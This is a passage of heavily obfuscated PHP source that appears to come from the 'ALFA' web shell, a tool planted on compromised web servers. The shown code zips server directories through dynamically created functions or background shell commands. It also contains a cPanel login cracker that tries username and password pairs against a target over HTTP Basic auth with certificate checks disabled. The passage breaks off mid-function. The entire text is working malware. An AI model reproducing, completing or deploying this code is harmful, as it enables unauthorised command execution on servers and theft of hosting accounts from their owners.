goto J9CRg; TRvIy: $dirzip = $_POST["\141\x6c\x66\x61\63"]; goto LE9Vg; J9CRg: if (class_exists("\x5a\151\x70\x41\x72\143\x68\151\x76\x65") && ($GLOBALS["\x73\x79\x73"] != "\x75\156\151\x78" || !_alfa_can_runCommand(true, true))) { goto cBIxn; ctEZP: $newfunc = create_function("\x24\163\157\x75\162\x63\x65\x2c\44\x64\x65\163\x74\x69\156\x61\164\151\x6f\156", $code); goto IKrql; IKrql: if ($newfunc($dirzip, $zipfile)) { echo __pre() . "\x3c\x63\145\156\164\145\x72\76\74\x70\x3e\x3c\x66\x6f\x6e\x74\40\x63\x6f\x6c\x6f\162\75\x22\147\162\145\145\x6e\42\76\123\x75\143\x63\145\x73\163\56\x2e\56\41\x3c\x62\162\x3e" . $zipfile . "\x3c\x2f\146\157\x6e\164\76\74\x2f\x70\76\74\x2f\143\145\x6e\164\x65\162\76"; } else { echo __pre() . "\x3c\x63\145\156\164\x65\162\76\x3c\160\x3e\x3c\146\x6f\156\164\x20\143\x6f\154\157\162\x3d\x22\x72\x65\x64\42\x3e\x45\x52\x52\x4f\x52\41\41\41\56\56\x2e\x3c\57\x66\157\x6e\x74\x3e\x3c\x2f\160\x3e\x3c\57\143\x65\156\x74\145\162\x3e"; } goto duFT8; cBIxn: $code = "\x69\x66\x28\x21\145\170\x74\145\156\x73\151\x6f\x6e\137\154\157\141\144\145\144\x28\47\172\x69\x70\x27\51\174\x7c\x21\x66\151\154\x65\137\145\170\151\163\164\163\x28\x24\163\157\165\x72\x63\x65\51\x29\x7b\162\x65\164\x75\162\x6e\40\146\x61\154\163\145\x3b\x7d\44\x7a\x69\160\75\x6e\145\x77\x20\x5a\x69\x70\101\x72\x63\x68\151\166\x65\50\51\x3b\151\x66\x28\x21\x24\172\151\160\55\76\157\x70\x65\156\50\x24\x64\145\x73\x74\x69\x6e\141\164\x69\157\156\54\132\111\120\101\122\x43\110\x49\x56\105\x3a\72\103\122\x45\x41\x54\105\x29\x29\x7b\x72\x65\164\x75\x72\156\x20\146\141\x6c\163\145\73\x7d\44\x73\x6f\165\x72\143\x65\75\x73\164\162\137\x72\x65\x70\x6c\x61\143\x65\x28\47\134\134\47\x2c\x27\x2f\x27\54\x72\145\141\154\160\141\x74\x68\x28\x24\x73\x6f\x75\162\x63\145\51\51\73\151\x66\50\x69\163\137\x64\x69\x72\x28\44\x73\x6f\x75\x72\x63\145\x29\75\x3d\x3d\x74\x72\x75\145\x29\173\44\146\151\x6c\145\x73\x3d\x6e\x65\x77\40\122\145\x63\165\x72\163\151\x76\x65\111\x74\x65\162\x61\x74\x6f\x72\111\x74\x65\162\141\164\157\x72\x28\x6e\145\167\40\122\x65\x63\165\162\163\151\166\145\x44\x69\162\x65\143\164\157\x72\x79\111\164\145\x72\x61\164\157\x72\x28\44\163\x6f\165\x72\x63\x65\x29\54\x52\145\x63\165\x72\163\151\166\x65\x49\x74\x65\x72\x61\164\157\162\111\164\145\x72\x61\164\157\x72\x3a\72\x53\105\x4c\x46\x5f\x46\x49\x52\x53\x54\51\x3b\x66\x6f\162\145\141\x63\150\x28\44\146\151\x6c\145\163\x20\x61\x73\40\44\x66\x69\154\145\x29\173\44\x66\151\x6c\x65\x3d\x73\x74\162\137\162\145\x70\x6c\x61\x63\145\x28\47\x5c\134\x27\x2c\47\x2f\47\54\44\x66\x69\154\145\x29\73\x69\146\x28\151\x6e\137\x61\162\162\x61\x79\50\163\165\x62\x73\164\x72\x28\x24\x66\x69\x6c\145\x2c\163\164\162\162\160\157\x73\50\44\x66\151\x6c\x65\54\x27\x2f\x27\51\53\x31\51\54\141\162\162\141\171\50\47\56\x27\x2c\47\56\x2e\x27\x29\x29\x29\x63\x6f\x6e\164\151\x6e\165\x65\73\44\x66\x69\x6c\x65\x3d\162\x65\x61\x6c\x70\141\164\150\50\44\x66\x69\x6c\145\51\73\x69\146\50\x69\x73\137\x64\x69\x72\x28\x24\146\151\154\145\51\x3d\75\x3d\164\162\165\145\51\x7b\44\172\x69\x70\x2d\76\141\144\144\x45\155\x70\164\x79\104\151\x72\50\x73\x74\x72\137\162\x65\160\154\141\x63\145\50\x24\x73\157\165\162\143\145\x2e\47\x2f\x27\54\x27\47\x2c\x24\146\151\x6c\145\56\x27\x2f\47\x29\x29\73\x7d\145\154\x73\145\x20\x69\x66\50\x69\x73\x5f\146\x69\154\x65\x28\44\x66\151\x6c\x65\x29\x3d\x3d\x3d\x74\162\165\x65\51\173\44\x7a\151\x70\x2d\76\141\144\144\x46\x72\x6f\155\x53\164\x72\151\x6e\x67\x28\163\164\x72\137\162\x65\160\x6c\x61\143\x65\50\x24\163\x6f\165\x72\x63\x65\x2e\x27\x2f\x27\54\47\47\54\44\x66\x69\x6c\145\51\54\x66\151\154\x65\137\147\x65\x74\x5f\143\157\156\x74\145\x6e\164\x73\50\x24\146\151\154\x65\x29\x29\73\x7d\175\x7d\x65\154\163\145\x20\x69\x66\x28\x69\x73\137\146\151\x6c\x65\x28\x24\x73\x6f\x75\x72\143\145\x29\x3d\75\75\x74\x72\x75\145\51\x7b\44\x7a\x69\x70\x2d\76\x61\144\144\x46\162\x6f\155\123\x74\162\x69\x6e\x67\50\142\x61\163\x65\156\141\155\x65\50\44\163\157\165\x72\x63\145\x29\x2c\x66\x69\x6c\x65\x5f\x67\145\x74\137\x63\157\x6e\164\x65\x6e\164\163\x28\44\163\157\x75\x72\x63\145\x29\x29\x3b\175\x72\x65\x74\165\162\x6e\40\44\x7a\x69\x70\x2d\76\143\x6c\157\163\145\x28\x29\73"; goto ctEZP; duFT8: } else { alfaEx("\143\x64\x20\x27" . addslashes(dirname($zipfile)) . "\47\73\172\x69\x70\40\55\162\40\x27" . addslashes(basename($zipfile)) . "\x27\40\x27" . addslashes($dirzip) . "\x27\x20\x3e\40\57\144\x65\x76\x2f\156\x75\x6c\x6c\x20\x26"); echo __pre() . "\74\x63\x65\x6e\x74\x65\162\x3e\74\160\76\120\x6c\x65\141\x73\145\x20\127\x61\151\x74\40\106\157\162\40\x31\x20\x6d\151\156\165\164\145\163\x20\101\x4e\x44\40\103\150\x65\x63\x6b\x20\x74\150\151\x73\40\55\x3e\x20\74\142\x3e\74\146\157\x6e\164\40\143\x6f\154\157\x72\75\42\147\x72\x65\x65\156\42\76" . $zipfile . "\74\x2f\x66\157\x6e\164\76\x3c\57\142\76\x3c\142\x72\x3e\102\x65\143\141\x75\163\145\x20\127\x65\x20\105\x78\x65\x63\165\164\145\x64\40\x54\150\145\x20\x43\157\155\155\141\x6e\144\x20\x69\x6e\x20\x54\150\145\40\142\x61\x63\x6b\x67\x72\x6f\x75\x6e\144\x20\41\74\57\x70\76\x3c\57\x63\x65\156\x74\x65\x72\x3e"; } goto dlgI3; dlgI3: } goto p2Q7i; p2Q7i: echo "\x3c\57\x64\151\166\x3e"; goto gZrHF; JjBxo: echo "\x3c\x64\151\x76\x20\x63\154\x61\163\163\75\x68\x65\x61\144\x65\162\x3e\74\160\x3e\74\143\x65\x6e\x74\x65\x72\76\x3c\x70\x3e\x3c\144\151\166\x20\x63\154\x61\x73\x73\x3d\42\x74\170\x74\146\x6f\x6e\164\x5f\x68\145\x61\144\x65\x72\42\x3e\174\x20\x43\157\x6d\160\162\x65\163\x73\157\162\40\174\x3c\x2f\x64\151\166\x3e\74\x2f\x70\x3e\xd\12\x3c\x66\x6f\162\155\40\x6f\156\x53\165\x62\155\151\164\75\x22\x67\x28\47\x7a\x69\x70\145\162\47\54\156\x75\x6c\x6c\54\156\x75\154\154\x2c\156\x75\154\154\54\164\150\151\x73\56\x64\151\x72\x7a\151\x70\56\x76\141\x6c\x75\x65\54\x74\150\x69\163\56\172\151\160\x66\x69\154\145\56\x76\141\154\165\x65\x2c\47\x3e\x3e\x27\51\x3b\x72\145\x74\x75\x72\x6e\x20\x66\x61\x6c\163\145\73\x22\40\x6d\145\x74\x68\157\144\75\x22\160\x6f\x73\x74\42\x3e\15\xa\74\x64\151\166\40\143\x6c\x61\x73\163\75\42\164\170\x74\146\157\156\x74\42\x3e\x44\151\162\57\x46\151\x6c\145\x3a\x20\x3c\57\x64\x69\166\x3e\40\x3c\151\x6e\160\x75\x74\40\x74\171\x70\145\x3d\42\x74\x65\x78\x74\x22\40\156\x61\155\x65\75\42\144\x69\162\x7a\x69\160\42\40\166\x61\x6c\x75\x65\x3d\42" . htmlspecialchars($GLOBALS["\x63\x77\144"]) . "\42\40\163\151\x7a\x65\x3d\42\66\x30\x22\x2f\76\15\12\x3c\x64\x69\x76\x20\x63\x6c\141\x73\163\x3d\42\x74\x78\x74\x66\157\x6e\164\x22\x3e\x53\x61\x76\x65\40\x44\151\x72\x3a\40\74\57\x64\151\x76\x3e\x20\x3c\151\156\160\x75\x74\x20\x74\171\x70\x65\x3d\42\164\x65\170\164\x22\40\x6e\141\x6d\145\75\42\x7a\x69\x70\146\x69\x6c\x65\x22\40\166\141\154\165\145\75\x22" . $GLOBALS["\143\167\144"] . "\141\x6c\146\141\56\x7a\151\x70\x22\x20\163\151\172\145\x3d\42\66\60\x22\57\x3e\15\xa\x3c\151\x6e\x70\x75\x74\x20\x74\x79\160\145\x3d\42\163\165\x62\x6d\151\164\x22\x20\166\141\x6c\x75\x65\x3d\x22\40\42\x20\x6e\x61\155\x65\x3d\x22\x7a\151\160\x65\162\42\x20\x2f\x3e\xd\12\74\57\146\157\162\155\x3e\74\x2f\143\x65\x6e\164\x65\162\x3e\74\57\x70\76"; goto cFWCP; RoJsV: AlfaNum(8, 9, 10); goto JjBxo; gZrHF: alfafooter(); goto fJHc2; fJHc2: } goto QA5cV; zhsok: function Alfa_CP_Cracker($info) { goto qM2F5; kHNNe: curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1); goto iteMt; NLc9C: curl_close($curl); goto Gd4Gn; qM2F5: $url = $info["\x70\162\157\x74\x6f\x63\157\154"] . $info["\164\x61\x72\147\145\x74"] . "\x3a" . $info["\160\x6f\x72\x74"]; goto eSTjW; nt9ub: $curl_error = curl_error($curl); goto lCtRP; sYo9a: curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0); goto qsVRU; OoxFf: curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, 0); goto sYo9a; qsVRU: curl_setopt($curl, CURLOPT_HEADER, 0); goto gI8AP; Nbw0z: curl_setopt($curl, CURLOPT_HTTPHEADER, array("\x41\165\164\x68\157\162\x69\172\x61\164\151\x6f\x6e\x3a\40\x42\x61\x73\x69\143\40" . __ZW5jb2Rlcg($info["\x75\x73\x65\x72\156\141\x6d\145"] . "\x3a" . $info["\x70\x61\163\163\167\x6f\162\x64"]) . "\12\15")); goto wmncM; e0WZl: $curl_errno = curl_errno($curl); goto nt9ub; gI8AP: curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); goto Nbw0z; iteMt: curl_setopt($curl, CURLOPT_USERAGENT, "\115\x6f\172\x69\154\x6c\x61\x2f\65\56\x30\40\50\127\151\156\144\157\x77\163\40\x4e\x54\x20\66\x2e\x32\x3b\40\x57\x4f\x57\66\64\x3b\x20\162\x76\x3a\x31\67\56\x30\x29\x20\107\145\143\x6b\x6f\57\62\60\61\x30\x30\61\60\x31\x20\x46\151\162\145\x66\x6f\170\x2f\x31\67\x2e\x30"); goto OoxFf; lCtRP: if ($curl_errno > 0) { echo "\74\146\x6f\x6e\164\x20\143\157\154\157\x72\75\x27\162\x65\144\x27\76\x45\162\x72\157\x72\x3a\x20{$curl_error}\x3c\57\x66\157\x6e\x74\x3e\74\142\162\76"; } elseif (preg_match("\57\x66\151\x6c\145\155\x61\x6e\141\x67\145\162\57\x69", $result)) { goto JtGR6; ocHHY: CrackerResualt($info); goto FRAOL; eNarQ: $info["\164\x61\162\x67\x65\x74"] = $url; goto ocHHY; JtGR6: echo "\x55\x73\145\x72\x4e\141\155\145\72\40\x3c\146\157\156\164\40\143\x6f\x6c\x6f\162\75\42\162\145\144\42\76" . $info["\165\x73\145\162\x6e\141\x6d\x65"] . "\74\57\x66\x6f\x6e\164\76\40\120\x61\x73\163\127\157\162\144\72\x20\74\146\x6f\x6e\x74\40\143\x6f\x6c\x6f\162\x3d\42\162\145\x64\42\x3e" . $info["\x70\x61\x73\163\x77\157\162\x64"] . "\74\x2f\x66\157\x6e\164\76\74\146\157\156\164\40\x63\157\154\x6f\162\x3d\42\147\162\x65\x65\156\42\x3e\x20\40\114\157\147\151\156\x20\x53\165\143\x63\x65\163\x73\x2e\56\56\x2e\x3c\57\x66\157\156\x74\x3e\x3c\142\162\x3e"; goto eNarQ; FRAOL: } goto NLc9C; eSTjW: $curl = curl_init(); goto kHNNe; wmncM: curl_setopt($curl, CURLOPT_URL, $url); goto iFNlZ; iFNlZ: $result = curl_exec($curl); goto e0WZl; Gd4Gn: } goto D494U; YuoxJ: function alfacgihtaccess($m, $d = '', $symname = false) { goto B3AA0; tKMEG: if ($m == "\x63\147\151") { $code = &